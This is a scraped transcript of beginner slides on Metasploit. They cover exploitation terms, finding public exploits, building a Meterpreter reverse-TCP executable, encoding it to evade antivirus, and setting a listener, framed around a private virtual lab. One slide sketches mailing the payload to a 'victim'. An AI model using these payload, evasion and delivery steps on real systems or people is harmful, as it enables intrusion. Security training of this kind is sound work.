Arvind Sharma - Metasploit 101 Part 1 -...
23
PART 1 MSF 101 By -: Arvind Sharma (Moderator Hcon Delhi)
Transcript of Arvind Sharma - Metasploit 101 Part 1 -...
PART 1
MSF 101
By -: Arvind Sharma
(Moderator Hcon Delhi)
About Me
• Security Enthusiast
• Works at no-where.com
• Works For Hcon Group & m0rphiz3.org• Works For Hcon Group & m0rphiz3.org
• Python coder
• Few More I will add in next meet ;)
Topics to be covered
• Understanding basic terminologies
• Exploiting the vulnerability manually
• What is MSF( Metasploit ) & why needed• What is MSF( Metasploit ) & why needed
• Brief History and Introduction
• Lab requirements , creation and pre-requisite for testing
• Basic Exploitation of Windows XP & Metasploitable
Note : This is not the end this is just the beginning , detail in next meets
Basic Terminologies
• Vulnerability : Weakness in System (Ex: Buffer Overflow , memory leaks etc.
)
• Exploit : Security Attack on the Vulnerability (Ex: Attacker use BOF to
execute his own code )execute his own code )
• Payload : Sequence of code that is executed when vulnerability is
triggered
• Shell codes : Shell payloads which provides interactive shell to control
compromise system
• Encoder : A software which converts a piece of code into another form
• Auxillary : Code’s other than exploits and vulnerability
• Session : Successful connection after exploitation
Lets find some vulnerability and exploit it manually
• Vulnerable Free Float FTP Server V 1.0 on Windows XP ( netapi too)
• Finding Public Exploit ( I prefer Python one )
• Crashing The Free Float FTP Server• Crashing The Free Float FTP Server
• Execution of shell code yes/no/why if no ?
• Vulnerable ssh on metasploitable 2
• Finding Public Exploit
• Exploiting vulnerable ssh
Place for Finding Public Exploits
http://www.securityfocus.com/
http://www.exploit-db.com/
http://packetstormsecurity.com/http://packetstormsecurity.com/
Might be more but these
serves the purpose
Scanning and enumerating the services
Note : Yellow Marked are vulnerable services
Exploiting the vulnerabilities using public exploits
So you saw working with public exploits creates a hectic situation Now here comes my SN1P3R Now here comes my SN1P3R
‘THE MSF’
MSF Overview• Metasploit Framework is a open source which provides
following features
• Information Gathering& Fingerprinting
• Exploit Development / Penetration Testing
• Payload creation and Encoding• Payload creation and Encoding
• Fuzzing ( use to test for app vulnerabilities ) etc
• Originally written in perl language by HD Moore for game
playing in network testing afterwards completely ported into
Ruby language.
• Now it is maintained by Rapid7 from 2009
http://www.rapid7.com/products/metasploit/download.jsp
Metasploit Directory Structure
root@bt:cd /pentest/exploits/framework2/
data lib exploits payloads encoders auxillary
Note: Few more are there but these are important ones
Interfaces provided by MSF
• Console ( root@bt: msfconsole )
• CLI ( msfcli
/exploit/windows/smb/ms08_067_netapi)
• Web• Web
• GUI
• Armitage
Demo of Different modes of opening and accessing MSF Console
(On Backtrack 5 R3)
• Using Backtrack Menu
Backtrack->Exploitation Tools->Network
Exploitation Tools-> Metasploit
Framework->msfconsoleFramework->msfconsole
• Using Directory traversal
root@bt: cd
/pentest/exploits/framework/
root@bt: ./msfconsole
• Directly through terminal
root@bt: msfconsole
Basic Exploitation Technique
Open Port Scan+Version Scan
Open Port and Service version
disclosuredisclosure
Exploit the Vulnerability
Get Full Control
Basic Commands of Metasploit Framework
• ? Or help -> Help Menu
• search < keyword > ->for searching the module
• use exploit/[Path] -> for using the exploit
• set PAYLOAD [path] -> specifying payload to be used
• show options -> to show options for current module
• set [option] [value] -> to set the values required for module
• exploit -> start the exploit• exploit -> start the exploit
Few Meterpreter Commands
• shell -> drops you to the shell prompt of compromised
host
• ps -> shows pid’s of running processes
• migrate [pid] -> migrate to different process
Note: For more commands and their description get the MSF cheat sheet
http://www.sans.org/media/netwars/brochure-netwars-2013.pdf
Using msfpayload and msfencode tools of MSF
• msfpayload -> used for shell code generation also for creating executables
from metasploit payload
Syntax : msfpayload [options] [var=val] >[S ummary [P]erl…………
example :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444
X > Desktop/payload.exe
• Msfencode -> another tool in msf used for encoding the payloads to decrease
the detection level
Example :
msfencode –t exe –x Desktop/payload.exe –k –o Desktop/encoded_payload.exe
–e x86/shikata_ga_nai 5
Note : More Detail will be in MSF 101 part 2 in next meet
After creating payload what should be done ?
exe payload + compress -> mail to victim -> victim execute -> boom
Creating a Listener for our exe payload
• Open msf and use multi/handler which is a stub program that
handles exploits launched outside of framework
msf > use exploit/multi/handler
• After using multi/handler we have to tell msf for which payload it • After using multi/handler we have to tell msf for which payload it
has to listen
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > show options ( set the LHOST and LPORT )
msf > set LHOST 192.168.0.2
msf > set LPORT 4444
Note : Now your listener is ready for meterpreter session
Lab Requirement and Creation of Lab for testing
Requirement:
1. Virtualization Software ( Virtual Box , Vmware etc )
2. ISO Image of different OS like Windows XP , Backtrack, Metasploitable
3. Your Brain
Creation of Lab in my way :-Creation of Lab in my way :-
• I prefer Virtual Box , why ? Because its free and also takes less space
• For Communication between the Virtual machines I create internal
network of VM’s with DHCP server on. Thus no need to set IP
manually
• Tests the things in internal network mode
• How to create DHCP Server and internal network go like this ……
continued………….
Lab Creation
Lab Creation
How to defense and detect meterpreter session and kill it
